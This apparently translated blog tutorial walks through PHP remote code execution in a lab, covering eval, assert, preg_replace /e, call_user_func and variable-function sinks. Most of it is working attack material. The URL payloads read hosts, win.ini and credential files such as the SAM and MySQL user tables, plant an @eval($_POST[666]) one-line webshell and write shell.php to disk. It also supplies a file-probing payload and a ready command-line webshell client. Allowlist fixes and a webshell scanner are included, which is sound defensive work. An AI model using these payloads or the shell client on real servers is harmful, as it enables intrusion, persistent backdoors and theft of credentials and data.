Command Execution Vulnerability - Remote Command Execution

1. Functions that execute code

In PHP, the functions and constructs that can be abused to run attacker-supplied code are listed below. Strictly speaking, none of them runs an operating-system command (that is what system(), exec(), shell_exec() and passthru() do): they evaluate PHP code, or call a function whose name the visitor chose. The effect is the same, because the injected PHP can itself call system().

1. array_map()

array_map() applies a callback to every element of an array. On 3.php the callback name is taken from the arr parameter of the request, so the visitor decides which function is called on each element.

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/3.php

2. Splice "?arr=print_r" after the URL, visit http://ip/os/3.php?arr=print_r, and each element of the array is printed

print_r() is the built-in function that prints human-readable information about a variable

3. Splice "?arr=phpinfo" after the URL, visit http://ip/os/3.php?arr=phpinfo, and check the execution effect: phpinfo() runs once per array element, which shows that any function name can be substituted


2. eval()

 

 

The meaning of this code: check whether the request carries the parameter a and, if it does, pass its value to eval(), which runs it as PHP code. eval() compiles complete statements, so the payload has to end with a semicolon.

 

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/eval.php

 

2. Splice "?a=echo 'This is test';" after the URL, visit http://ip/os/eval.php?a=echo 'This is test';, and the string is echoed back (the browser URL-encodes the spaces and quotes)

3. Splice "?a=phpinfo();" after the URL, visit http://ip/os/eval.php?a=phpinfo();, and check the execution effect


3. assert(): the function is similar to eval(), but the two are different

eval is a language construct, not a function, so it cannot be invoked through a variable function or call_user_func(); assert() is an ordinary function and can be, which is why the call_user_func() and $a($b) examples below pivot through it. assert() evaluates a string argument as a PHP expression on PHP 5 and 7.0/7.1 (so the trailing semicolon is optional); from PHP 7.2 this is deprecated, and from PHP 8.0 the string is no longer executed at all, so the lab target must be running an older release. It also only runs when assertions are enabled (zend.assertions = 1 and assert.active = 1, the defaults outside php.ini-production).

 

 

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php

2. Splice "?a=var_dump(array(1,2,3))" after the URL, visit http://ip/os/assert.php?a=var_dump(array(1,2,3)), and the code executes

3. Splice "?a=phpinfo()" after the URL, visit http://ip/os/assert.php?a=phpinfo(), and check the execution effect
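The two string-evaluation sinks side by side, as an added example that is not the lab's own eval.php or assert.php (their source was only shown as screenshots). The two sink functions are an assumed reconstruction of what the text describes; the other two functions are the checks a tester would run before relying on these sinks on a given PHP version.

```php
<?php
// Added example for the eval() and assert() sections. The sink functions reconstruct the
// lab pages from the text (assumption); nothing here is the original page's code.

// eval.php as described: if a is present, run its value as PHP. eval() compiles statements,
// so the payload must end in ";" (eval('phpinfo()') is a parse error, eval('phpinfo();') runs).
function sink_eval(array $get): void
{
    if (isset($get['a'])) {
        eval($get['a']);
    }
}

// assert.php as described. On PHP 5 and 7.0/7.1 a string argument is compiled as
// "return <string>;", so a=phpinfo() works with or without a trailing ";".
// PHP 7.2 marks this deprecated; PHP 8.0 no longer evaluates the string at all.
function sink_assert(array $get): void
{
    if (isset($get['a'])) {
        assert($get['a']);
    }
}

// Does this interpreter still execute string assertions? The probe string sets a global when
// it runs, so the answer is false on PHP 8, and on PHP 7 when zend.assertions is -1 or 0.
// The @ hides the PHP 7.2+ deprecation notice.
function string_assert_is_live(): bool
{
    $GLOBALS['assert_probe'] = false;
    @assert('$GLOBALS["assert_probe"] = true');
    return $GLOBALS['assert_probe'] === true;
}

// The distinction the text draws: eval is a language construct with no function entry, so a
// variable function cannot reach it (PHP 7+ throws Error "Call to undefined function eval()");
// assert() is a real function and can be called that way, which is what the call_user_func()
// and $a($b) examples later rely on.
function reachable_as_variable_function(string $name): bool
{
    try {
        $f = $name;
        $f('1');
        return true;
    } catch (Error $e) {
        return false;
    }
}

// There is no hardened version of either sink; the fix is to delete them. Setting
// zend.assertions = -1 in php.ini (the php.ini-production default) makes direct assert()
// calls a no-op for the whole application, which also closes the assert() pivot.
var_dump(string_assert_is_live());
var_dump(reachable_as_variable_function('eval'), reachable_as_variable_function('assert'));
```

Run it with the CLI interpreter of the target's PHP version: string_assert_is_live() tells you whether the assert.php style of payload will execute at all, and the second call shows why the later sections pass a=assert rather than a=eval to call_user_func().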

4. preg_replace()

preg_replace("/(.*)/e", '\\1', $_GET['a']);

/(.*)/e is the pattern: (.*) captures the entire input, and the e modifier tells preg_replace() to substitute the captures into the replacement string and then evaluate the result as PHP code

'\\1' is the replacement: a back-reference to the first capture group, i.e. the whole input, which is therefore what gets evaluated

The difference between preg_replace("/(.*)/e", '\\1', $_GET['a']); and preg_replace("/\[(.*)\]/e", '\\1', $_GET['a']); is that the second pattern only captures text enclosed in square brackets, so the payload must be wrapped in [ ], e.g. ?a=[phpinfo()]. The brackets have to be escaped in the pattern: unescaped, [(.*)] is a character class and contains no capture group at all.

The /e modifier is deprecated since PHP 5.5 and was removed in PHP 7.0, where preg_replace() emits "Unknown modifier 'e'" and returns NULL, so this sink is only live on PHP 5 targets.

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/preg_replace.php

2. Splice "?a=var_dump(array(1,2,3))" after the URL, visit http://ip/os/preg_replace.php?a=var_dump(array(1,2,3)), and the code executes

3. Splice "?a=phpinfo()" after the URL, visit http://ip/os/preg_replace.php?a=phpinfo(), and check the execution effect
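The /e sink, its bracketed variant and the preg_replace_callback() form that replaces it, as an added example (not the lab's preg_replace.php, which is assumed to be the one-liner quoted above). The upper-casing in the safe version is a stand-in for whatever transformation the original replacement was meant to perform.

```php
<?php
// Added example for the preg_replace() section; the two sink functions reconstruct the lab
// page from the text (assumption), the rest is the fix and a version probe.

// Legacy sink. With /e, preg_replace() substitutes the captures into the replacement string
// and evals the result, so '\\1' (the whole input) becomes code: a=phpinfo() runs phpinfo().
// PHP 5.5 warns that /e is deprecated; PHP 7.0+ refuses it ("Unknown modifier 'e'") and
// returns NULL.
function sink_preg_replace_e(string $input)
{
    return preg_replace("/(.*)/e", '\\1', $input);
}

// The bracketed variant from the text. Only what is between [ and ] is captured and
// evaluated, so the payload must be wrapped: a=[phpinfo()]. The brackets are escaped in
// the pattern; unescaped, [(.*)] would be a character class with no capture group.
function sink_preg_replace_e_brackets(string $input)
{
    return preg_replace("/\[(.*)\]/e", '\\1', $input);
}

// Safe form: the transformation is a closure written by the developer, not code assembled
// from the match. Here the bracketed text is upper-cased (illustrative choice).
function safe_bracket_transform(string $input): string
{
    return preg_replace_callback('/\[(.*?)\]/', function (array $m): string {
        return strtoupper($m[1]);
    }, $input);
}

// True if this interpreter still honours /e, i.e. the legacy sink above is live.
// The replacement becomes strtoupper("x") after substitution; only an eval produces "X".
function preg_e_is_live(): bool
{
    $r = @preg_replace('/(x)/e', 'strtoupper("\\1")', 'x');
    return $r === 'X';
}

var_dump(preg_e_is_live());
echo safe_bracket_transform('[phpinfo()] stays text'), "\n";
```

On PHP 7 or later preg_e_is_live() is false and both sink functions return NULL with a warning, which is why this lab only works against a PHP 5 target; the callback version behaves identically on every release.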


5. call_user_func()

call_user_func() calls the function named by its first argument and passes the remaining arguments to it. On call_user_func.php both the function name (a) and the argument (b) come from the request, so a=assert turns it back into the string-evaluation sink above.

 

 

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/call_user_func.php

2. Splice "?a=assert&b=var_dump(array(1,2,3))" after the URL, visit http://ip/os/call_user_func.php?a=assert&b=var_dump(array(1,2,3)), and the code executes

3. Splice "?a=assert&b=phpinfo()" after the URL, visit http://ip/os/call_user_func.php?a=assert&b=phpinfo(), and check the execution effect


6. $a($b): a variable function, used the same way as call_user_func(). When a string variable is followed by parentheses, PHP calls the function with that name, so $a($b) with both values taken from the request is call_user_func($a, $b) without the wrapper.

 

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/kbhs.php

2. Splice "?a=assert&b=var_dump(array(1,2,3))" after the URL, visit http://ip/os/kbhs.php?a=assert&b=var_dump(array(1,2,3)), and the code executes

3. Splice "?a=assert&b=phpinfo()" after the URL, visit http://ip/os/kbhs.php?a=assert&b=phpinfo(), and check the execution effect
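The three callback sinks from items 1, 5 and 6 of this list are the same bug, a request-supplied string chosen as the function to call, so one added example covers them. It is not the lab's 3.php, call_user_func.php or kbhs.php (their source was only shown as images): the three sink functions are an assumed reconstruction, with the array contents and parameter names guessed from the URLs. The hardened dispatcher that follows is the point.

```php
<?php
// Added example for array_map(), call_user_func() and variable functions. The sinks are a
// reconstruction of the lab pages (assumption); the allowlist dispatcher is the fix.

// 3.php: arr=print_r prints each element; arr=phpinfo calls phpinfo(1), phpinfo(2), phpinfo(3).
function sink_array_map(array $get): array
{
    return array_map($get['arr'], [1, 2, 3]);
}

// call_user_func.php: a=assert&b=phpinfo() reaches string evaluation through assert();
// a=system&b=id reaches an OS command directly.
function sink_call_user_func(array $get)
{
    return call_user_func($get['a'], $get['b']);
}

// kbhs.php: a variable function is the same call without the wrapper.
function sink_variable_function(array $get)
{
    $a = $get['a'];
    $b = $get['b'];
    return $a($b);
}

// is_callable() and function_exists() are not a fix: system, exec and assert are all callable.
// The request must never pick the function. Map a short token to a fixed set of callbacks
// and reject anything else.
const ALLOWED_OPERATIONS = [
    'upper' => 'strtoupper',
    'lower' => 'strtolower',
    'trim'  => 'trim',
];

function safe_dispatch(string $op, string $arg): string
{
    if (!array_key_exists($op, ALLOWED_OPERATIONS)) {
        throw new InvalidArgumentException("unsupported operation: " . $op);
    }
    $fn = ALLOWED_OPERATIONS[$op];
    return $fn($arg);
}

// The same allowlist applied to the array_map() case.
function safe_array_map(string $op, array $values): array
{
    if (!array_key_exists($op, ALLOWED_OPERATIONS)) {
        throw new InvalidArgumentException("unsupported operation: " . $op);
    }
    return array_map(ALLOWED_OPERATIONS[$op], $values);
}

// Demonstration: the allowlisted token works, an injected function name is refused.
echo safe_dispatch('upper', 'hello'), "\n";
print_r(safe_array_map('trim', ['  a ', ' b']));
try {
    safe_dispatch('system', 'id');
} catch (InvalidArgumentException $e) {
    echo "refused: ", $e->getMessage(), "\n";
}
```

The token is looked up with array_key_exists() rather than in_array() so that a name such as "system" can never be matched by accident, and the callable itself never appears in the request.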


2. Exploitation of Remote Command Execution Vulnerabilities

1. Using PHP magic constants to obtain information

Principle:

If a remote code execution vulnerability is found on the website, information about the target can be obtained by printing PHP's magic constants.
PHP provides a large number of predefined constants to every script it runs. Many of them are defined by extensions and are only present when the extension is loaded, dynamically or at compile time. Eight of them are magic constants whose value depends on where in the code they are used:

__LINE__       The current line number of the file
__FILE__       The full path and file name of the file. Used inside an included file, it returns the name of the included file
__DIR__        The directory of the file. Used inside an included file, it returns the directory of the included file
__FUNCTION__   The name of the function the constant appears in (added in PHP 4.3.0). Since PHP 5 it returns the name as declared (case-sensitive); in PHP 4 it was always lowercase
__CLASS__      The name of the class as declared (added in PHP 4.3.0). Since PHP 5 it returns the name as declared (case-sensitive)
__TRAIT__      The trait name (added in PHP 5.4.0). Since PHP 5.4.0 PHP implements a code-reuse mechanism called traits
__METHOD__     The class method name (added in PHP 5.0.0). Returns the name as declared (case-sensitive)
__NAMESPACE__  The name of the current namespace (case-sensitive). This constant is defined at compile time (added in PHP 5.3.0)

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php

2. Splice "?a=print(__LINE__)" after the URL, visit http://ip/os/assert.php?a=print(__LINE__), execute the code, and get the current line number. Note: each name is wrapped in two underscores on each side. Inside code evaluated by assert() the count starts at the beginning of the evaluated string, so this is less informative than the next two

3. Splice "?a=print(__DIR__)" after the URL, visit http://ip/os/assert.php?a=print(__DIR__), execute the code, and get the directory the current file is in

4. Splice "?a=print(__FILE__)" after the URL, visit http://ip/os/assert.php?a=print(__FILE__), execute the code, and get the full path of the current file. __DIR__ and __FILE__ reveal where the document root is on disk, which is what the file-write step later needs for absolute paths


2. Reading files through remote code execution

Principle:

The vulnerability can be used to read operating-system and application files with the privileges of the web server account, and so obtain sensitive information. Typical targets are listed below; which ones are actually readable depends on that account's permissions and on the open_basedir setting.
Windows sensitive files:

C:\boot.ini                                  // boot configuration, reveals the system version
C:\windows\system32\inetsrv\MetaBase.xml     // IIS configuration file
C:\windows\repair\sam                        // backup of the SAM made at installation (password hashes)
C:\program Files\mysql\my.ini                // MySQL configuration
C:\program Files\mysql\data\mysql\user.MYD   // MySQL user table data, including the root password hash
C:\windows\php.ini                           // PHP configuration
......

Linux sensitive files:

/etc/passwd                                       // Linux user accounts
/usr/local/app/apache2/conf/httpd.conf            // Apache 2 configuration file
/usr/local/app/php5/lib/php.ini                   // PHP configuration file
/etc/httpd/conf/httpd.conf                       // Apache configuration file
/etc/my.cnf                                      // MySQL configuration file
......

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php

2. Splice "?a=var_dump(file_get_contents('C:\Windows\System32\drivers\etc\hosts'))" after the URL, visit http://ip/os/assert.php?a=var_dump(file_get_contents('C:\Windows\System32\drivers\etc\hosts')), execute the code and get the contents of the hosts file. A PHP Warning also appears: assert() reports a failed assertion because var_dump() returns NULL, but by then the code has already run, so it does not affect the result

hosts is a system file that maps host names to IP addresses; it is consulted before DNS

3. Splice "?a=var_dump(file_get_contents('C:\Windows\win.ini'))" after the URL, visit http://ip/os/assert.php?a=var_dump(file_get_contents('C:\Windows\win.ini')), execute the code, and get the contents of win.ini

win.ini is a basic configuration file of the Windows system, made up of sections of related settings: parts of the Windows operating environment, how windows and the mouse are displayed and positioned, associations between file types and applications, default size, layout and text colours for help and dialog windows, and so on.
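The file-read step as a reusable payload, added here and not taken from the page. Given candidate paths (the two lists above plus the two files the lab reads), it reports which ones the web server's account can read and returns the first bytes of each. It handles the failure mode the page mentions: file_get_contents() on a missing or forbidden path emits a Warning and returns false, and open_basedir makes the same calls fail, so a null result means "not readable from here", not "absent".

```php
<?php
// Added example for the file-read section. The candidate paths are the page's lists; the
// code is not the lab's own payload.

// Returns path => first $maxBytes bytes, or null when the file cannot be read. The @ hides
// the Warning that a missing/forbidden path produces; the === false check is what matters,
// because an empty file legitimately returns "".
function probe_files(array $paths, int $maxBytes = 256): array
{
    $result = [];
    foreach ($paths as $path) {
        $data = @file_get_contents($path, false, null, 0, $maxBytes);
        $result[$path] = ($data === false) ? null : $data;
    }
    return $result;
}

// Keep only the entries that were readable.
function readable_only(array $probed): array
{
    return array_filter($probed, function ($v) {
        return $v !== null;
    });
}

// Candidates from the tables above; only those present and readable on the target come back.
$candidates = [
    'C:\Windows\System32\drivers\etc\hosts',
    'C:\Windows\win.ini',
    'C:\boot.ini',
    'C:\windows\system32\inetsrv\MetaBase.xml',
    'C:\windows\repair\sam',
    'C:\program Files\mysql\my.ini',
    'C:\windows\php.ini',
    '/etc/passwd',
    '/etc/my.cnf',
    '/etc/httpd/conf/httpd.conf',
    '/usr/local/app/apache2/conf/httpd.conf',
    '/usr/local/app/php5/lib/php.ini',
];

foreach (readable_only(probe_files($candidates)) as $path => $head) {
    printf("%s (%d bytes shown)\n%s\n\n", $path, strlen($head), $head);
}
```

Run locally it simply shows what the current account can read. Delivered through the vulnerability it is too long for a GET parameter, so it is the kind of code one posts to the one-sentence shell described in the next section rather than splicing after ?a=.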


3. Planting a one-sentence Trojan through remote code execution

Principle:

The vulnerability can be used to run a one-sentence Trojan (a one-line PHP webshell), which a webshell client such as China Chopper can then connect to: GetShell.

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php

2. Splice "?a=@eval($_POST[666])" after the URL, visit http://ip/os/assert.php?a=@eval($_POST[666]), execute the code, and the one-sentence Trojan is in place. A Warning appears because assert() treats the NULL returned by eval() as a failed assertion; it does not affect execution. Nothing is written to disk: the shell exists only in requests that carry this a parameter, so the client must use the full URL including it

666 is the name of the POST parameter the shell reads, which is what China Chopper calls the connection password

3. Open China Chopper (中国菜刀)

4. Right-click the blank space and click "Add" to add the shell address

  • Address: the one-sentence Trojan URL, http://ip/os/assert.php?a=@eval($_POST[666]), with the connection password 666
  • Script type: PHP

5. Click "Add", then double-click the entry to open a session on the target

 

The remote code execution vulnerability is exploited to execute a one-sentence Trojan, thus GetShell.
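What the "double-click" step does on the wire, as an added command-line client. This is not part of the page and not China Chopper's code: it POSTs PHP code to the one-sentence shell under the parameter name used as the password (666 here, as on the page) and prints what the code echoed. It assumes the shell URL is passed as the first argument; for the assert.php variant that is the full URL including ?a=@eval($_POST[666]), because the shell only exists inside that request.

```php
<?php
// Added example for the one-sentence Trojan section: a minimal replacement for the
// China Chopper "connect" step. URL, password and code are command-line arguments.

function webshell_call(string $url, string $password, string $code): string
{
    // Markers isolate the shell's output from anything else the page prints (the assert()
    // Warning, surrounding HTML). The code is terminated with ";" in case the caller left it off.
    $wrapped = 'echo "<<OUT>>";' . rtrim($code, "; \n") . ';echo "<<END>>";';
    $ctx = stream_context_create(['http' => [
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => http_build_query([$password => $wrapped]),
        'ignore_errors' => true,   // still read the body on a 500 caused by a broken payload
        'timeout'       => 15,
    ]]);
    $body = file_get_contents($url, false, $ctx);
    if ($body === false) {
        throw new RuntimeException("request to $url failed");
    }
    return extract_between($body, '<<OUT>>', '<<END>>');
}

// Returns the text between the two markers; missing markers mean the shell did not run the
// code (wrong password, assert() disabled, file removed), which is reported instead of
// returning the raw page.
function extract_between(string $haystack, string $start, string $end): string
{
    $s = strpos($haystack, $start);
    $e = ($s === false) ? false : strpos($haystack, $end, $s + strlen($start));
    if ($s === false || $e === false) {
        throw new RuntimeException("markers not found; the shell did not run the code");
    }
    $s += strlen($start);
    return substr($haystack, $s, $e - $s);
}

// Usage: php client.php 'http://ip/os/assert.php?a=@eval($_POST[666])' 666 'echo __FILE__; system("whoami");'
if (PHP_SAPI === 'cli' && $argc >= 4) {
    echo webshell_call($argv[1], $argv[2], $argv[3]), "\n";
}
```

The same client works unchanged against the shell.php file written in the next section, with http://ip/os/shell.php as the first argument.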


4. Writing a shell through remote code execution

Principle: the vulnerability can be used to execute code that writes a file, so a new script file is created on the server and, unlike the previous section, persists on disk.

1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php

2. Splice "?a=var_dump(file_put_contents($_POST[1],$_POST[2]))" after the URL, visit http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])), and send the POST data 1=info.php&2=<?php phpinfo();?>. The code executes (a Warning appears for the same reason as before) and var_dump() shows the number of bytes written. Taking the file name and contents from POST keeps the PHP tags out of the URL and out of the web server's access log. The relative name info.php is resolved against the directory of assert.php, which is why the file lands under /os/; use the absolute path learned from __DIR__ to write anywhere else

3. Visit http://ip/os/info.php: the newly generated info.php script is parsed and executed

4. Splice "?a=var_dump(file_put_contents($_POST[1],$_POST[2]))" after the URL, visit http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])), and send the POST data 1=shell.php&2=<?php @eval($_POST[666]);?>. The code executes (Warning as before)

5. Visit http://ip/os/shell.php: a blank page with no error is the expected result, since the one-sentence Trojan produces no output without the 666 parameter; the shell.php file has been generated

6. Open China Chopper (Guogou) by double-clicking the exe file

7. Right-click the blank space and click "Add" to add the shell address

  • Address: http://ip/os/shell.php, with the connection password 666
  • Script type: PHP

8. Click "Add", then double-click the entry to open a session on the target

The remote code execution vulnerability is exploited to run file-writing code that generates a new script file or a one-sentence Trojan file.
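A small detector for what sections 3 and 4 leave behind, added here as the defender's counterpart; it is not from the page. It looks for the one-sentence shell pattern, the string-evaluation sinks, the /e modifier and request-controlled callbacks from the first part of the article, and also lists PHP files written recently, which is how info.php and shell.php stand out even when their content looks harmless. The web root it scans is constructed in a temporary directory with the lab's files, so the script runs offline; point scan_dir() at a real document root to use it.

```php
<?php
// Added example: heuristic scanner for the sinks and dropped files described in this article.
// Patterns are deliberately simple and will miss obfuscated shells; they are a starting point.

const SHELL_PATTERNS = [
    'eval/assert on request data'   => '/@?\s*(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[/i',
    'preg_replace with /e modifier' => '/preg_replace\s*\(\s*(["\'])\/.*?\/[a-z]*e[a-z]*\1/is',
    'callback taken from request'   => '/(call_user_func(_array)?|array_map)\s*\(\s*\$_(POST|GET|REQUEST)\s*\[/i',
];

// Labels of every pattern that matches the file's source.
function classify_file(string $path): array
{
    $src = @file_get_contents($path);
    if ($src === false) {
        return [];
    }
    $hits = [];
    foreach (SHELL_PATTERNS as $label => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Walks $root and returns path => findings for every PHP file that matched a pattern or was
// modified within $recentSeconds. On a real server compare against a known-good manifest
// instead of relying on mtime alone, since an attacker can reset it.
function scan_dir(string $root, int $recentSeconds = 86400): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!preg_match('/\.(php|phtml|php[3-7])$/i', $file->getFilename())) {
            continue;
        }
        $hits = classify_file($file->getPathname());
        if (time() - $file->getMTime() < $recentSeconds) {
            $hits[] = 'recently written';
        }
        if ($hits) {
            $findings[$file->getPathname()] = $hits;
        }
    }
    ksort($findings);
    return $findings;
}

// Constructed sample web root: the lab's sinks, the two files step 4 drops, and a clean file.
$root = sys_get_temp_dir() . '/os_scan_' . uniqid();
mkdir($root);
$samples = [
    'shell.php'        => '<?php @eval($_POST[666]);?>',
    'info.php'         => '<?php phpinfo();?>',
    'assert.php'       => '<?php if (isset($_GET["a"])) assert($_GET["a"]);',
    'preg_replace.php' => '<?php preg_replace("/(.*)/e", \'\\\\1\', $_GET["a"]);',
    'index.php'        => '<?php echo "hello";',
];
foreach ($samples as $name => $src) {
    file_put_contents("$root/$name", $src);
}

foreach (scan_dir($root) as $path => $hits) {
    echo basename($path), ': ', implode(', ', $hits), "\n";
}
```

In the constructed root every file is freshly written, so all five are reported as recent; only shell.php, assert.php and preg_replace.php additionally match a sink pattern, and info.php shows why the "new file" signal is needed at all: its content is innocuous and only its appearance gives it away.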


That's all for this article


Origin blog.csdn.net/weixin_54055099/article/details/126905545